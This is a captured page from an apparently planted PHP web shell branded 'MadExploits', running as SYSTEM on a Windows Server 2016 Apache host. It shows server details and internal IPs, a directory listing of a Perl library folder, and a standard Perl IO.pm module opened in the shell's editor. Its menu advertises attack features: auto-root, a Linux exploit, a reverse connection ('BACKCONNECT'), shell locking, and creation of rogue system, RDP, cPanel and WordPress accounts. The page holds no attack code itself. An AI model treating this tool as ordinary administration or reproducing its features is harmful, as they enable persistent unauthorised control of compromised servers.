Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
usr /
lib /
perl5 /
core_perl /
[ HOME SHELL ]
Name
Size
Permission
Action
B
[ DIR ]
drwxrwxrwx
CORE
[ DIR ]
drwxrwxrwx
Compress
[ DIR ]
drwxrwxrwx
Data
[ DIR ]
drwxrwxrwx
Devel
[ DIR ]
drwxrwxrwx
Digest
[ DIR ]
drwxrwxrwx
Encode
[ DIR ]
drwxrwxrwx
File
[ DIR ]
drwxrwxrwx
Filter
[ DIR ]
drwxrwxrwx
Hash
[ DIR ]
drwxrwxrwx
I18N
[ DIR ]
drwxrwxrwx
IO
[ DIR ]
drwxrwxrwx
IPC
[ DIR ]
drwxrwxrwx
List
[ DIR ]
drwxrwxrwx
MIME
[ DIR ]
drwxrwxrwx
Math
[ DIR ]
drwxrwxrwx
PerlIO
[ DIR ]
drwxrwxrwx
Scalar
[ DIR ]
drwxrwxrwx
Sub
[ DIR ]
drwxrwxrwx
Sys
[ DIR ]
drwxrwxrwx
Time
[ DIR ]
drwxrwxrwx
Unicode
[ DIR ]
drwxrwxrwx
Win32API
[ DIR ]
drwxrwxrwx
auto
[ DIR ]
drwxrwxrwx
threads
[ DIR ]
drwxrwxrwx
B.pm
29.39
KB
-rw-rw-rw-
Config.pm
3.04
KB
-rw-rw-rw-
Config_git.pl
409
B
-rw-rw-rw-
Config_heavy.pl
41.67
KB
-rw-rw-rw-
Cwd.pm
20.97
KB
-rw-rw-rw-
DynaLoader.pm
25.47
KB
-rw-rw-rw-
Encode.pm
31.45
KB
-rw-rw-rw-
Errno.pm
6.54
KB
-rw-rw-rw-
Fcntl.pm
3.89
KB
-rw-rw-rw-
IO.pm
1.43
KB
-rw-rw-rw-
NDBM_File.pm
3.01
KB
-rw-rw-rw-
O.pm
4.19
KB
-rw-rw-rw-
Opcode.pm
15.98
KB
-rw-rw-rw-
POSIX.pm
19.91
KB
-rw-rw-rw-
SDBM_File.pm
3.72
KB
-rw-rw-rw-
Socket.pm
36.16
KB
-rw-rw-rw-
Storable.pm
48.75
KB
-rw-rw-rw-
Win32.pm
61.06
KB
-rw-rw-rw-
Win32CORE.pm
1.27
KB
-rw-rw-rw-
attributes.pm
15.97
KB
-rw-rw-rw-
encoding.pm
22.41
KB
-rw-rw-rw-
lib.pm
5.99
KB
-rw-rw-rw-
mro.pm
9.61
KB
-rw-rw-rw-
ops.pm
997
B
-rw-rw-rw-
re.pm
28.04
KB
-rw-rw-rw-
threads.pm
37.06
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IO.pm
# package IO; use XSLoader (); use Carp; use strict; use warnings; our $VERSION = "1.50"; XSLoader::load 'IO', $VERSION; sub import { shift; warnings::warnif('deprecated', qq{Parameterless "use IO" deprecated}) if @_ == 0 ; my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir); local @INC = @INC; pop @INC if $INC[-1] eq '.'; eval join("", map { "require IO::" . (/(\w+)/)[0] . ";\n" } @l) or croak $@; } 1; __END__ =head1 NAME IO - load various IO modules =head1 SYNOPSIS use IO qw(Handle File); # loads IO modules, here IO::Handle, IO::File use IO; # DEPRECATED =head1 DESCRIPTION C<IO> provides a simple mechanism to load several of the IO modules in one go. The IO modules belonging to the core are: IO::Handle IO::Seekable IO::File IO::Pipe IO::Socket IO::Dir IO::Select IO::Poll Some other IO modules don't belong to the perl core but can be loaded as well if they have been installed from CPAN. You can discover which ones exist with this query: L<https://metacpan.org/search?q=IO%3A%3A>. For more information on any of these modules, please see its respective documentation. =head1 DEPRECATED use IO; # loads all the modules listed below The loaded modules are IO::Handle, IO::Seekable, IO::File, IO::Pipe, IO::Socket, IO::Dir. You should instead explicitly import the IO modules you want. =cut
Close